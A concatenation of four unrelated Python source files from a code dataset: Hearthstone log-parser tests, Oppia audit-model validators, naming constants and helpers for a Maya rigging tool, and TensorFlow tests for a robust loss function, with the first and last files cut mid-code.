assert not game.players[1].is_ai
assert not game.players[1].name
# Test packet structure
assert len(packet_tree.packets) == 1
packet = packet_tree.packets[0]
assert packet.power_type == PowerType.CREATE_GAME
assert packet.entity == game.id == 1
# Player packet objects are not the same as players
assert packet.players[0].entity.entity_id == game.players[0].id
assert packet.players[0].player_id == game.players[0].player_id
assert packet.players[1].entity.entity_id == game.players[1].id
assert packet.players[1].player_id == game.players[1].player_id
# All tags should be empty (we didn't pass any)
assert not game.tags
assert not game.players[0].tags
assert not game.players[1].tags
# Check some basic logic
assert game.get_player(1) is game.players[0]
assert game.get_player(2) is game.players[1]
def test_tag_value_parsing():
tag, value = parse_initial_tag("tag=ZONE value=PLAY")
assert tag == GameTag.ZONE
assert value == Zone.PLAY
tag, value = parse_initial_tag("tag=CARDTYPE value=PLAYER")
assert tag == GameTag.CARDTYPE
assert value == CardType.PLAYER
tag, value = parse_initial_tag("tag=1 value=2")
assert tag == 1
assert value == 2
tag, value = parse_initial_tag("tag=9999998 value=123")
assert tag == 9999998
assert value == 123
def test_game_initialization():
parser = LogParser()
parser.read(StringIO(data.INITIAL_GAME))
parser.flush()
assert len(parser.games) == 1
packet_tree = parser.games[0]
game = packet_tree.export().game
assert len(game._entities) == 3
assert len(game.players) == 2
assert game.tags == {
GameTag.TURN: 1,
GameTag.ZONE: Zone.PLAY,
GameTag.ENTITY_ID: 1,
GameTag.NEXT_STEP: Step.BEGIN_MULLIGAN,
GameTag.CARDTYPE: CardType.GAME,
GameTag.STATE: State.RUNNING,
}
assert game.initial_state == State.RUNNING
assert game.initial_step == Step.INVALID
assert game.players[0].tags == {
GameTag.PLAYSTATE: PlayState.PLAYING,
GameTag.PLAYER_ID: 1,
GameTag.TEAM_ID: 1,
GameTag.ZONE: Zone.PLAY,
GameTag.CONTROLLER: 1,
GameTag.ENTITY_ID: 2,
GameTag.CARDTYPE: CardType.PLAYER,
}
assert game.players[1].tags == {
GameTag.PLAYSTATE: PlayState.PLAYING,
GameTag.CURRENT_PLAYER: 1,
GameTag.FIRST_PLAYER: 1,
GameTag.PLAYER_ID: 2,
GameTag.TEAM_ID: 2,
GameTag.ZONE: Zone.PLAY,
GameTag.CONTROLLER: 2,
GameTag.ENTITY_ID: 3,
GameTag.CARDTYPE: CardType.PLAYER,
}
def test_timestamp_parsing():
parser = LogParser()
parser.read(StringIO(data.INITIAL_GAME))
parser.flush()
assert parser.games[0].packets[0].ts == time(2, 59, 14, 608862)
# Test with an initial datetime
parser2 = LogParser()
parser2._current_date = datetime(2015, 1, 1)
parser2.read(StringIO(data.INITIAL_GAME))
parser2.flush()
assert parser2.games[0].packets[0].ts == datetime(2015, 1, 1, 2, 59, 14, 608862)
# Same test, with timezone
parser2 = LogParser()
parser2._current_date = parse_datetime("2015-01-01T02:58:00+0200")
parser2.read(StringIO(data.INITIAL_GAME))
parser2.flush()
ts = parser2.games[0].packets[0].ts
assert ts.year == 2015
assert ts.hour == 2
assert ts.second == 14
assert ts.tzinfo
assert ts.utcoffset() == timedelta(hours=2)
def test_repeated_timestamps():
parser = LogParser()
parser._current_date = parse_datetime("2015-01-01T02:58:00+0200")
parser.read(StringIO(data.INITIAL_GAME))
with patch("hslog.parser.parse_time", wraps=parse_time) as spy:
parser.read(StringIO(data.REPEATED_TIMESTAMP))
spy.assert_called_once() # The same repeated timestamp should only be parsed once
ts1 = parser.games[0].packets[-1].ts
ts2 = parser.games[0].packets[-2].ts
assert ts1 == ts2
def test_unroundable_timestamp():
parser = LogParser()
parser.read(StringIO(data.INITIAL_GAME))
parser.read(StringIO(data.UNROUNDABLE_TIMESTAMP))
parser.flush()
# Timestamp has to be truncated
assert parser.games[0].packets[1].ts == time(14, 43, 59, 999999)
def test_info_outside_of_metadata():
parser = LogParser()
parser.read(StringIO(data.INITIAL_GAME))
parser.flush()
info = u"D 02:59:14.6500380 GameState.DebugPrintPower() - Info[0] = 99"
parser.read(StringIO(info))
parser.flush()
def test_empty_entity_in_options():
parser = LogParser()
parser.read(StringIO(data.INITIAL_GAME))
parser.flush()
line = "target 0 entity="
with pytest.raises(ParsingError):
# This can happen, but the game is corrupt
parser.handle_options(None, line)
def test_warn_level():
parser = LogParser()
parser.read(StringIO(data.INITIAL_GAME))
parser.flush()
line = u"W 09:09:23.1428700 GameState.ReportStuck() - Stuck for 10s 89ms. {...}"
parser.read(StringIO(line))
parser.flush()
def test_error_level():
parser = LogParser()
parser.read(StringIO(data.INITIAL_GAME))
parser.flush()
line = u"E 02:08:13.8318679 SubSpellController {...}"
parser.read(StringIO(line))
parser.flush()
def test_empty_tasklist():
parser = LogParser()
parser.read(StringIO(data.INITIAL_GAME))
parser.flush()
ts = datetime.now()
msg = "id=4 Player=The Innkeeper TaskList=1 ChoiceType=GENERAL CountMin=1 CountMax=1"
choices = parser.handle_entity_choices(ts, msg)
assert choices
assert choices.id == 4
assert choices.player.name == "The Innkeeper"
assert choices.tasklist == 1
assert choices.type == ChoiceType.GENERAL
assert choices.min == 1
assert choices.max == 1
# Test empty tasklist
msg = "id=4 Player=The Innkeeper TaskList= ChoiceType=GENERAL CountMin=1 CountMax=1"
choices = parser.handle_entity_choices(ts, msg)
assert choices.tasklist is None
def test_tag_change_unknown_entity_format():
# Format changed in 15590
parser = LogParser()
parser.read(StringIO(data.INITIAL_GAME))
parser.flush()
entity_format = (
"[name=UNKNOWN ENTITY [cardType=INVALID] id=24 zone=DECK zonePos=0 cardId= player=1]"
)
id = parser.parse_entity_id(entity_format)
assert id == 24
line = "TAG_CHANGE Entity=%s tag=ZONE value=HAND" % (entity_format)
packet = parser.handle_power(None, "TAG_CHANGE", line)
assert packet.power_type == PowerType.TAG_CHANGE
assert packet.entity == id
assert packet.tag == GameTag.ZONE
assert packet.value == Zone.HAND
def test_initial_deck_initial_controller():
parser = LogParser()
parser.read(StringIO(data.INITIAL_GAME))
parser.read(StringIO(data.FULL_ENTITY))
parser.flush()
packet_tree = parser.games[0]
game = packet_tree.export().game
assert len(list(game.players[0].initial_deck)) == 1
assert len(list(game.players[1].initial_deck)) == 0
parser = LogParser()
parser.read(StringIO(data.INITIAL_GAME))
parser.read(StringIO(data.FULL_ENTITY))
parser.read(StringIO(data.CONTROLLER_CHANGE))
parser.flush()
packet_tree = parser.games[0]
game = packet_tree.export().game
assert len(list(game.players[0].initial_deck)) == 1
assert len(list(game.players[1].initial_deck)) == 0
def test_invalid_game_one_player():
parser = LogParser()
with pytest.raises(ParsingError):
parser.read(StringIO(data.INVALID_GAME))
def test_options_packet_with_errors():
parser = LogParser()
parser.read(StringIO(data.INITIAL_GAME))
parser.read(StringIO(data.OPTIONS_WITH_ERRORS))
parser.flush()
packet_tree = parser.games[0]
options_packet = packet_tree.packets[-1]
op0 = options_packet.options[0]
assert op0.id == 0
assert op0.type == OptionType.END_TURN
assert op0.entity is None
assert op0.error == PlayReq.INVALID
assert op0.error_param is None
op1 = options_packet.options[1]
assert op1.id == 1
assert op1.type == OptionType.POWER
assert op1.entity == 33
assert op1.error is None
assert op1.error_param is None
assert len(op1.options) == 12
target = op1.options[11]
assert target.id == 11
assert target.entity == 37
assert target.error == PlayReq.REQ_TARGET_MAX_ATTACK
assert target.error_param == 3
def test_options_no_option_packet():
parser = LogParser()
parser.read(StringIO(data.INITIAL_GAME))
with pytest.raises(ParsingError):
parser.handle_options(None, "option 0 type=END_TURN mainEntity=")
def test_suboptions_no_option_packet():
parser = LogParser()
parser.read(StringIO(data.INITIAL_GAME))
with pytest.raises(ParsingError):
parser.handle_options(None, "subOption 0 entity=1")
def test_error_unhandled_powtype():
parser = LogParser()
parser.read(StringIO(data.INITIAL_GAME))
# This shouldn't raise an exception
parser.read(StringIO(
"D 02:13:03.1360001 GameState.DebugPrintPower() - "
"ERROR: unhandled PowType RESET_GAME"
))
parser.flush()
def test_target_no_entity():
parser = LogParser()
parser.read(StringIO(data.INITIAL_GAME))
parser.read(StringIO(
"D 01:02:58.3254653 GameState.DebugPrintOptions() - id=2\n" # noqa
"D 01:02:58.3254653 GameState.DebugPrintOptions() - option 0 type=END_TURN mainEntity= error=INVALID errorParam=\n" # noqa
"D 01:02:58.3254653 GameState.DebugPrintOptions() - option 1 type=POWER mainEntity= error=NONE errorParam=\n" # noqa
"D 01:02:58.3254653 GameState.DebugPrintOptions() - target 0 entity= error=NONE errorParam=\n" # noqa
"D 01:02:58.3254653 GameState.DebugPrintOptions() - target 1 entity= error=NONE errorParam=\n" # noqa
))
parser.flush()
packet_tree = parser.games[0]
options_packet = packet_tree.packets[-1]
option = options_packet.options[1]
target = option.options[0]
assert target.entity is None
assert target.error is None
assert target.error_param is None
def test_reset_game():
parser = LogParser()
parser.read(StringIO(data.INITIAL_GAME))
# This shouldn't raise an exception
parser.read(StringIO(
"D 15:39:19.3190860 GameState.DebugPrintPower() - BLOCK_START BlockType=GAME_RESET Entity=[entityName=Temporal Loop id=17 zone=PLAY zonePos=0 cardId=GILA_900p player=1] EffectCardId= EffectIndex=-1 Target=0 SubOption=-1\n" # noqa
"D 15:39:19.3190860 GameState.DebugPrintPower() - RESET_GAME\n"
))
parser.flush()
def test_sub_spell():
parser = LogParser()
parser.read(StringIO(data.INITIAL_GAME))
parser.read(StringIO(data.SUB_SPELL_BLOCK))
parser.flush()
packet_tree = parser.games[0]
play_block = packet_tree.packets[-1]
power_block = play_block.packets[0]
assert len(power_block.packets) == 1
sub_spell_packet = power_block.packets[0]
assert sub_spell_packet.spell_prefab_guid == (
"CannonBarrage_Missile_FX:e26b4681614e0964aa8ef7afebc560d1"
)
assert sub_spell_packet.source == 59
assert sub_spell_packet.target_count == 1
assert sub_spell_packet.targets == [41]
def test_sub_spell_battlegrounds():
parser = LogParser()
parser.read(StringIO(data.INITIAL_GAME))
parser.read(StringIO(data.BGS_SUB_SPELL_BLOCK))
parser.flush()
packet_tree = parser.games[0]
play_block = packet_tree.packets[-1]
power_block = play_block.packets[0]
assert len(power_block.packets) == 1
sub_spell_packet = power_block.packets[0]
assert sub_spell_packet.spell_prefab_guid == (
"Bacon_FreezeMinions_AE_Super.prefab:49de73d8b72602f47994a795a78f050d"
)
assert sub_spell_packet.source == 0
assert sub_spell_packet.target_count == 0
assert sub_spell_packet.targets == []
def test_options_missing_block_end():
parser = LogParser()
parser.read(StringIO(data.INITIAL_GAME))
parser.read(StringIO(
"D 09:01:05.7959635 GameState.DebugPrintPower() - BLOCK_START BlockType=ATTACK Entity=[entityName=Rat Pack id=2974 zone=PLAY zonePos=2 cardId=CFM_316 player=3] EffectCardId= EffectIndex=1 Target=0 SubOption=-1 \n" # noqa
"D 09:01:05.7959635 GameState.DebugPrintPower() - BLOCK_START BlockType=TRIGGER Entity=[entityName=3ofKindCheckPlayerEnchant id=3319 zone=PLAY zonePos=0 cardId=TB_BaconShop_3ofKindChecke player=3] EffectCardId= EffectIndex=-1 Target=0 SubOption=-1 TriggerKeyword=0\n" # noqa
"D 09:01:05.7959635 GameState.DebugPrintPower() - BLOCK_END\n" # noqa
"D 09:01:05.7959635 GameState.DebugPrintPower() - TAG_CHANGE Entity=BehEh#1355 tag=NUM_OPTIONS_PLAYED_THIS_TURN value=15 \n" # noqa
"D 09:01:05.8620235 GameState.DebugPrintOptions() - id=76\n" # noqa
"D 09:01:05.8620235 GameState.DebugPrintOptions() - option 0 type=END_TURN mainEntity= error=INVALID errorParam=\n" # noqa
))
parser.flush()
packet_tree = parser.games[0]
block_without_end = packet_tree.packets[1]
assert isinstance(block_without_end, packets.Block)
assert block_without_end.ended
options_packet = packet_tree.packets[-1]
assert isinstance(options_packet, packets.Options)
def test_cached_tag_for_dormant_change():
parser = LogParser()
parser.read(StringIO(data.INITIAL_GAME))
parser.read(StringIO(data.CACHED_TAG_FOR_DORMANT_CHANGE))
parser.flush()
packet_tree = parser.games[0]
cached_tag_packet = packet_tree.packets[1]
assert cached_tag_packet.entity == 417
assert cached_tag_packet.tag == GameTag.DEATHRATTLE
assert cached_tag_packet.value == 1
def test_cached_tag_for_dormant_change_entity_id_only():
parser = LogParser()
parser.read(StringIO(data.INITIAL_GAME))
parser.read(StringIO(data.CACHED_TAG_FOR_DORMANT_CHANGE_SHORT_ENTITY))
parser.flush()
packet_tree = parser.games[0]
cached_tag_packet = packet_tree.packets[1]
assert cached_tag_packet.entity == 593
assert cached_tag_packet.tag == GameTag.DEATHRATTLE
assert cached_tag_packet.value == 1
def test_vo_spell_only():
parser = LogParser()
parser.read(StringIO(data.INITIAL_GAME))
parser.read(StringIO(data.VO_SPELL))
parser.flush()
packet_tree = parser.games[0]
vo_spell_packet = packet_tree.packets[1]
assert vo_spell_packet.brguid == (
"VO_BTA_BOSS_07h2_Female_NightElf_Mission_Fight_07_PlayerStart_01.prefab:616c9e5" +
"7bb7fce54684e26be50462d17"
)
assert vo_spell_packet.vospguid == ""
assert vo_spell_packet.blocking is True
assert vo_spell_packet.delayms == 1000
def test_shuffle_deck_only():
parser = LogParser()
parser.read(StringIO(data.INITIAL_GAME))
parser.read(StringIO(data.SHUFFLE_DECK))
parser.flush()
packet_tree = parser.games[0]
shuffle_deck_packet = packet_tree.packets[1]
assert shuffle_deck_packet.player_id == 2
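# Illustrative sketch only (not part of the original test module): the same
# LogParser flow the tests above exercise, applied to a log file on disk.
# The file name "Power.log" is hypothetical.
if __name__ == "__main__":
    parser = LogParser()
    with open("Power.log") as f:
        parser.read(f)
    parser.flush()
    exported_game = parser.games[0].export().game
    print(len(exported_game.players), "players")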
|
the-stack_106_19093
|
# coding: utf-8
#
# Copyright 2020 The Oppia Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS-IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Validators for audit models."""
from __future__ import absolute_import # pylint: disable=import-only-modules
from __future__ import unicode_literals # pylint: disable=import-only-modules
from core.domain import base_model_validators
class RoleQueryAuditModelValidator(base_model_validators.BaseModelValidator):
"""Class for validating RoleQueryAuditModels."""
@classmethod
def _get_model_id_regex(cls, item):
# Valid id: [user_id].[timestamp_in_sec].[intent].[random_number]
regex_string = '^%s\\.\\d+\\.%s\\.\\d+$' % (item.user_id, item.intent)
return regex_string
@classmethod
def _get_external_id_relationships(cls, item):
return [
base_model_validators.UserSettingsModelFetcherDetails(
'user_ids', [item.user_id],
may_contain_system_ids=False,
may_contain_pseudonymous_ids=False)]
class UsernameChangeAuditModelValidator(
base_model_validators.BaseModelValidator):
"""Class for validating UsernameChangeAuditModels."""
@classmethod
def _get_model_id_regex(cls, item):
# Valid id: [committer_id].[timestamp_in_sec]
# committer_id refers to the user that is making the change.
regex_string = '^%s\\.\\d+$' % item.committer_id
return regex_string
@classmethod
def _get_external_id_relationships(cls, item):
return [
base_model_validators.UserSettingsModelFetcherDetails(
'committer_ids', [item.committer_id],
may_contain_system_ids=False,
may_contain_pseudonymous_ids=False)]
|
the-stack_106_19095
|
import pymel.core as pm
# ------------------------------------------------------------------------------
# -- This is a list of Component types. These are used in META nodes
# -- to define the type of component (such as guide, skeleton etc)
COMPONENT_MARKER = 'crabComponent'
# ------------------------------------------------------------------------------
# -- This is a list of names which define attributes on meta nodes.
META_IDENTIFIER = 'Identifier'
META_VERSION = 'Version'
META_OPTIONS = 'Options'
META_CONTENTS = 'Contents'
# ------------------------------------------------------------------------------
# -- This is a list of attribute names used by the internals of
# -- crab to resolve relationships between objects
BOUND = 'crabBinding'
BEHAVIOUR_DATA = 'crabBehaviours'
# ------------------------------------------------------------------------------
RIG_ROOT_LINK_ATTR = 'crabRigHost'
CONNECTION_PREFIX = 'crabRootConnection'
SKELETON_ROOT_LINK_ATTR = '%sSkeleton' % CONNECTION_PREFIX
CONTROL_ROOT_LINK_ATTR = '%sControls' % CONNECTION_PREFIX
GUIDE_ROOT_LINK_ATTR = '%sGuide' % CONNECTION_PREFIX
# ------------------------------------------------------------------------------
# -- This is a group of layer names
HIDDEN_LAYER = 'Hidden'
CONTROL_LAYER = 'Controls'
SKELETON_LAYER = 'Skeleton'
GEOMETRY_LAYER = 'Geometry'
# ------------------------------------------------------------------------------
# -- This is a list of name prefixes for structural objects created
# -- within a crab rig hierarchy
RIG_ROOT = 'RIG'
RIG_COMPONENT = 'CMP'
GUIDE_COMPONENT = 'GCM'
META = 'META'
# ------------------------------------------------------------------------------
# -- This is a list of pre-fixes for general use within a crab plugin
# -- in order to keep naming consistent
ORG = 'ORG'
CONTROL = 'CTL'
ZERO = 'ZRO'
OFFSET = 'OFF'
SKELETON = 'SKL'
MECHANICAL = 'MEC'
MATH = 'MATH'
MARKER = 'LOC'
GUIDE = 'GDE'
PIVOT = 'PIV'
LOGIC = 'LGC'
SNAP = 'SNP'
IK = 'IKH'
EFFECTOR = 'EFF'
CLUSTER = 'CLS'
UPVECTOR = 'UPV'
SPLINE = 'CRV'
CONSTRAINT = 'CNS'
CONSTRAINTGROUP = 'CNSG'
PREFIXES = [
ORG,
CONTROL,
ZERO,
OFFSET,
SKELETON,
MECHANICAL,
MATH,
MARKER,
GUIDE,
PIVOT,
LOGIC,
SNAP,
IK,
EFFECTOR,
CLUSTER,
UPVECTOR,
SPLINE,
CONSTRAINT,
CONSTRAINTGROUP,
]
# ------------------------------------------------------------------------------
# -- This is a list of suffixes for general use within a crab plugin
# -- in order to keep naming consistent
# -- Sides and Locations
LEFT = 'LF'
RIGHT = 'RT'
MIDDLE = 'MD'
FRONT = 'FR'
BACK = 'BK'
TOP = 'TP'
BOTTOM = 'BT'
SIDELESS = 'NA'
LOCATIONS = [
LEFT,
RIGHT,
MIDDLE,
FRONT,
BACK,
TOP,
BOTTOM,
SIDELESS,
]
# ------------------------------------------------------------------------------
# -- Define colours based on categories
LEFT_COLOR = [252, 48, 1]
RIGHT_COLOR = [0, 162, 254]
MIDDLE_COLOR = [254, 209, 0]
NON_ANIMATABLE_COLOUR = [150, 150, 150]
GUIDE_COLOR = [162, 222, 0]
# ------------------------------------------------------------------------------
# -- Defines attribute defaults
DEFAULT_CONTROL_ROTATION_ORDER = 5
# ------------------------------------------------------------------------------
# -- Defines attribute defaults
OWNED_LAYERS = [
'Hidden',
'Controls',
'Skeleton',
'Geometry',
]
# ------------------------------------------------------------------------------
# noinspection PyUnresolvedReferences
def name(prefix, description, side, counter=1):
"""
Generates a unique name with the given naming parts
:param prefix: Typically this is used to denote usage type. Note that this
should not be 'node type' but should be representative of what the node
is actually being used for in the rig.
:type prefix: str
:param description: This is the descriptive element of the rig and should
ideally be upper camel case.
:type description: str
:param side: This is the location of the element, such as LF, RT or MD etc
:type side: str
:param counter: To ensure all names are unique we use a counter. By default
all counters start at 1, but you may override this.
:type counter: int
:return: str -- a unique name of the form '<PREFIX>_<description>_<counter>_<SIDE>', e.g. 'CTL_Arm_1_LF'
"""
while True:
candidate = '%s_%s_%s_%s' % (
prefix.upper(),
description,
counter,
side.upper(),
)
# -- If the name is unique, return it
if not pm.objExists(candidate):
return candidate
# -- The name already exists, so increment our
# -- counter
counter += 1
# ------------------------------------------------------------------------------
def get_prefix(given_name):
"""
Assuming the given name adheres to the naming convention of crab this
will extract the prefix element of the name.
:param given_name: Name to extract from
:type given_name: str or pm.nt.DependNode
:return: str
"""
return str(given_name).split(':')[-1].split('_')[0]
# ------------------------------------------------------------------------------
def get_description(given_name):
"""
Assuming the given name adheres to the naming convention of crab this
will extract the descriptive element of the name.
:param given_name: Name to extract from
:type given_name: str or pm.nt.DependNode
:return: str
"""
return str(given_name).split(':')[-1].split('_')[1]
# ------------------------------------------------------------------------------
def get_counter(given_name):
"""
Assuming the given name adheres to the naming convention of crab this
will extract the counter element of the name.
:param given_name: Name to extract from
:type given_name: str or pm.nt.DependNode
:return: int
"""
parts = given_name.split('_')
for part in parts:
if part.isnumeric():
return int(part)
return None
# ------------------------------------------------------------------------------
def get_side(given_name):
"""
Assuming the given name adheres to the naming convention of crab this
will extract the side/location element of the name.
:param given_name: Name to extract from
:type given_name: str or pm.nt.DependNode
:return: str
"""
parts = given_name.split('_')
if not parts:
return ''
return parts[-1]
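# ------------------------------------------------------------------------------
# -- Illustrative sketch only (not part of the original module): how the
# -- helpers above decompose a crab-convention name. The sample name is
# -- hypothetical; name() itself needs a live Maya scene, and running this
# -- file standalone still requires pymel because of the import at the top.
if __name__ == '__main__':
    sample = '%s_%s_%s_%s' % (CONTROL, 'Arm', 1, LEFT)  # 'CTL_Arm_1_LF'
    assert get_prefix(sample) == CONTROL
    assert get_description(sample) == 'Arm'
    assert get_counter(sample) == 1
    assert get_side(sample) == LEFT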
|
the-stack_106_19096
|
# coding=utf-8
# Copyright 2019 The Google Research Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Tests for general.py."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import numpy as np
import tensorflow as tf
from robust_loss import general
class LossfunTest(tf.test.TestCase):
def setUp(self):
super(LossfunTest, self).setUp()
np.random.seed(0)
def _assert_all_close_according_to_type(self, a, b):
"""AssertAllClose() with tighter thresholds for float64 than float32."""
self.assertAllCloseAccordingToType(
a, b, rtol=1e-15, atol=1e-15, float_rtol=1e-6, float_atol=1e-6)
def _precompute_lossfun_inputs(self, float_dtype):
"""Precompute a loss and its derivatives for random inputs and parameters.
Generates a large number of random inputs to the loss, and random
shape/scale parameters for the loss function at each sample, and
computes the loss and its derivative with respect to all inputs and
parameters, returning everything to be used to assert various properties
in our unit tests.
Args:
float_dtype: The float precision to be used (np.float32 or np.float64).
Returns:
A tuple containing:
(the number (int) of samples, and the length of all following arrays,
A np.array (float_dtype) of losses for each sample,
A np.array (float_dtype) of residuals of each sample (the loss inputs),
A np array (float_dtype) of shape parameters of each loss,
A np.array (float_dtype) of scale parameters of each loss,
A np.array (float_dtype) of derivatives of each loss wrt each x,
A np.array (float_dtype) of derivatives of each loss wrt each alpha,
A np.array (float_dtype) of derivatives of each loss wrt each scale)
Typical usage example:
(num_samples, loss, x, alpha, scale, d_x, d_alpha, d_scale)
= self._precompute_lossfun_inputs(np.float32)
"""
with self.session() as sess:
num_samples = 100000
# Normally distributed inputs.
x = float_dtype(np.random.normal(size=num_samples))
# Uniformly distributed values in (-16, 3), quantized to the nearest 0.1
# to ensure that we hit the special cases at 0, 2.
alpha = float_dtype(
np.round(np.random.uniform(-16, 3, num_samples) * 10) / 10.)
# Push the sampled alphas at the extents of the range to +/- infinity, so
# that we probe those cases too.
alpha[alpha == 3.] = float_dtype(float('inf'))
alpha[alpha == -16.] = -float_dtype(float('inf'))
# Random log-normally distributed values in approx (1e-5, 100000):
scale = float_dtype(
np.exp(np.random.normal(size=num_samples) * 4.) + 1e-5)
# Compute the loss and its derivative with respect to all three inputs.
x_ph = tf.placeholder(x.dtype, num_samples)
alpha_ph = tf.placeholder(alpha.dtype, num_samples)
scale_ph = tf.placeholder(scale.dtype, num_samples)
lossfun_ph = general.lossfun(x_ph, alpha_ph, scale_ph)
loss, (d_x, d_alpha, d_scale) = sess.run(
(lossfun_ph,
tf.gradients(tf.reduce_sum(lossfun_ph),
(x_ph, alpha_ph, scale_ph))), {
x_ph: x,
alpha_ph: alpha,
scale_ph: scale,
})
return (num_samples, loss, x, alpha, scale, d_x, d_alpha, d_scale)
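# Illustrative note only (not part of the original test module): the
# properties exercised below are consequences of the general robust loss of
# Barron (2019), which away from its special cases (alpha in {0, 2, +/-inf},
# handled as limits) has the form
#   rho(x, alpha, c) = (|alpha - 2| / alpha)
#                      * (((x / c)**2 / |alpha - 2| + 1)**(alpha / 2) - 1)
# e.g. it tends to 0.5 * (x / c)**2 as alpha -> 2 and is bounded above by
# (alpha - 2) / alpha when alpha < 0. See general.lossfun for the
# authoritative implementation.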
def _lossfun_preserves_dtype(self, float_dtype):
"""Check the loss's output has the same precision as its input."""
n = 16
x = float_dtype(np.random.normal(size=n))
alpha = float_dtype(np.random.normal(size=n))
scale = float_dtype(np.exp(np.random.normal(size=n)))
with self.session():
y = general.lossfun(x, alpha, scale).eval()
self.assertDTypeEqual(y, float_dtype)
def testLossfunPreservesDtypeSingle(self):
self._lossfun_preserves_dtype(np.float32)
def testLossfunPreservesDtypeDouble(self):
self._lossfun_preserves_dtype(np.float64)
def _derivative_is_monotonic_wrt_x(self, float_dtype):
# Check that the loss increases monotonically with |x|.
_, _, x, alpha, _, d_x, _, _ = self._precompute_lossfun_inputs(float_dtype)
d_x[~np.isfinite(d_x)] = 0 # This is just to suppress a warning below.
mask = np.isfinite(alpha) & (
np.abs(d_x) > (100. * np.finfo(float_dtype).eps))
self.assertAllEqual(np.sign(d_x[mask]), np.sign(x[mask]))
def testDerivativeIsMonotonicWrtXSingle(self):
self._derivative_is_monotonic_wrt_x(np.float32)
def testDerivativeIsMonotonicWrtXDouble(self):
self._derivative_is_monotonic_wrt_x(np.float64)
def _loss_is_near_zero_at_origin(self, float_dtype):
# Check that the loss is near-zero when x is near-zero.
_, loss, x, _, _, _, _, _ = self._precompute_lossfun_inputs(float_dtype)
self.assertTrue(np.all(np.abs(loss[np.abs(x) < 1e-5]) < 1e-5))
def testLossIsNearZeroAtOriginSingle(self):
self._loss_is_near_zero_at_origin(np.float32)
def testLossIsNearZeroAtOriginDouble(self):
self._loss_is_near_zero_at_origin(np.float64)
def _loss_is_quadratic_near_origin(self, float_dtype):
# Check that the loss is well-approximated by a quadratic bowl when
# |x| < scale
_, loss, x, _, scale, _, _, _ = self._precompute_lossfun_inputs(float_dtype)
mask = np.abs(x) < (0.5 * scale)
loss_quad = 0.5 * np.square(x / scale)
self.assertAllClose(loss_quad[mask], loss[mask], rtol=1e-5, atol=1e-2)
def testLossIsQuadraticNearOriginSingle(self):
self._loss_is_quadratic_near_origin(np.float32)
def testLossIsQuadraticNearOriginDouble(self):
self._loss_is_quadratic_near_origin(np.float64)
def _loss_is_bounded_when_alpha_is_negative(self, float_dtype):
# Assert that loss < (alpha - 2)/alpha when alpha < 0.
_, loss, _, alpha, _, _, _, _ = self._precompute_lossfun_inputs(float_dtype)
mask = alpha < 0.
min_val = np.finfo(float_dtype).min
alpha_clipped = np.maximum(min_val, alpha[mask])
self.assertTrue(
np.all(loss[mask] <= ((alpha_clipped - 2.) / alpha_clipped)))
def testLossIsBoundedWhenAlphaIsNegativeSingle(self):
self._loss_is_bounded_when_alpha_is_negative(np.float32)
def testLossIsBoundedWhenAlphaIsNegativeDouble(self):
self._loss_is_bounded_when_alpha_is_negative(np.float64)
def _derivative_is_bounded_when_alpha_is_below_2(self, float_dtype):
# Assert that |d_x| < |x|/scale^2 when alpha <= 2.
_, _, x, alpha, scale, d_x, _, _ = self._precompute_lossfun_inputs(
float_dtype)
mask = np.isfinite(alpha) & (alpha <= 2)
self.assertTrue(
np.all((np.abs(d_x[mask]) <=
((np.abs(x[mask]) +
(100. * np.finfo(float_dtype).eps)) / scale[mask]**2))))
def testDerivativeIsBoundedWhenAlphaIsBelow2Single(self):
self._derivative_is_bounded_when_alpha_is_below_2(np.float32)
def testDerivativeIsBoundedWhenAlphaIsBelow2Double(self):
self._derivative_is_bounded_when_alpha_is_below_2(np.float64)
def _derivative_is_bounded_when_alpha_is_below_1(self, float_dtype):
# Assert that |d_x| < 1/scale when alpha <= 1.
_, _, _, alpha, scale, d_x, _, _ = self._precompute_lossfun_inputs(
float_dtype)
mask = np.isfinite(alpha) & (alpha <= 1)
self.assertTrue(
np.all((np.abs(d_x[mask]) <=
((1. + (100. * np.finfo(float_dtype).eps)) / scale[mask]))))
def testDerivativeIsBoundedWhenAlphaIsBelow1Single(self):
self._derivative_is_bounded_when_alpha_is_below_1(np.float32)
def testDerivativeIsBoundedWhenAlphaIsBelow1Double(self):
self._derivative_is_bounded_when_alpha_is_below_1(np.float64)
def _alpha_derivative_is_positive(self, float_dtype):
# Assert that d_loss / d_alpha > 0.
_, _, _, alpha, _, _, d_alpha, _ = self._precompute_lossfun_inputs(
float_dtype)
mask = np.isfinite(alpha)
self.assertTrue(np.all(d_alpha[mask] > (-100. * np.finfo(float_dtype).eps)))
def testAlphaDerivativeIsPositiveSingle(self):
self._alpha_derivative_is_positive(np.float32)
def testAlphaDerivativeIsPositiveDouble(self):
self._alpha_derivative_is_positive(np.float64)
def _scale_derivative_is_negative(self, float_dtype):
# Assert that d_loss / d_scale < 0.
_, _, _, alpha, _, _, _, d_scale = self._precompute_lossfun_inputs(
float_dtype)
mask = np.isfinite(alpha)
self.assertTrue(np.all(d_scale[mask] < (100. * np.finfo(float_dtype).eps)))
def testScaleDerivativeIsNegativeSingle(self):
self._scale_derivative_is_negative(np.float32)
def testScaleDerivativeIsNegativeDouble(self):
self._scale_derivative_is_negative(np.float64)
def _loss_is_scale_invariant(self, float_dtype):
# Check that loss(mult * x, alpha, mult * scale) == loss(x, alpha, scale)
(num_samples, loss, x, alpha, scale, _, _,
_) = self._precompute_lossfun_inputs(float_dtype)
with self.session() as sess:
# Random log-normally distributed scalings in ~(0.2, 20)
mult = float_dtype(
np.maximum(0.2, np.exp(np.random.normal(size=num_samples))))
# Compute the scaled loss.
x_ph = tf.placeholder(x.dtype, num_samples)
alpha_ph = tf.placeholder(alpha.dtype, num_samples)
scale_ph = tf.placeholder(scale.dtype, num_samples)
